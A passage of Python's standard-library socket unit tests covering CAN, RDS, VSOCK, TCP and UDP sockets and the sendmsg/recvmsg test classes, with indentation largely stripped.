# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family and
# type; it just populates the socket object with the values given.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
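# --- Illustrative sketch (not part of the test suite) ------------------------
# The classes below drive sendmsg()/recvmsg() through a fairly deep mixin
# hierarchy.  As a minimal standalone reference, this is roughly what a single
# round trip looks like on a POSIX platform whose socket objects provide
# socketpair(), sendmsg() and recvmsg(); the helper name below is an assumption
# made for this sketch only.
def _sendmsg_recvmsg_roundtrip_sketch():
    import socket as _socket
    cli, srv = _socket.socketpair()        # connected pair of AF_UNIX sockets
    try:
        # Gather-write two buffers; no ancillary data, no flags.
        sent = cli.sendmsg([b"he", b"llo"])
        # recvmsg() returns (data, ancdata, msg_flags, address).
        data, ancdata, msg_flags, _addr = srv.recvmsg(16)
        # A 5-byte local write arrives in one piece in practice.
        assert sent == 5 and data == b"hello" and ancdata == []
    finally:
        cli.close()
        srv.close()
# ------------------------------------------------------------------------------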
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
